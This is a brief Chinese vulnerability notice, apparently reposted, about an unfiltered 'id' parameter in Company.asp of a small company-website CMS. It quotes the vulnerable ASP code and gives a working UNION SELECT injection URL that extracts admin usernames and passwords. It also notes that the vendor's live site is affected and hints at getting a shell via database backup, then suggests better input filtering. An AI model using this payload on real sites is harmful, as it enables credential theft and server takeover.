文件:Company.asp <% ID=trim(request.QueryString("id")) if ID="" then ID=1 set Rs = server.createobject("adodb.recordset") Rs.source = "select * from Company where ID="&ID&"" Rs.open Rs.source,conn,1,3 if Rs.eof then Content="还没有添加相关内容!" else Kig=Rs("Kig") Rs("kig")=Kig+1 Rs.update Content=Rs("Content") ComName=Rs("ComName") end if Rs.close set Rs=nothing %> 什么都没过滤。。 exp: Company.asp?id=2 union select 1,username,password,4,5,6,7,8 from Nwebadmin 官网也存在。。 备份 数据库 可以拿到shell。 www.2cto.com提供修复: 加强上述提及代码的过滤
查看更多关于企成电气公司企业网站管理系统v1.0(中英文版)漏的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did12404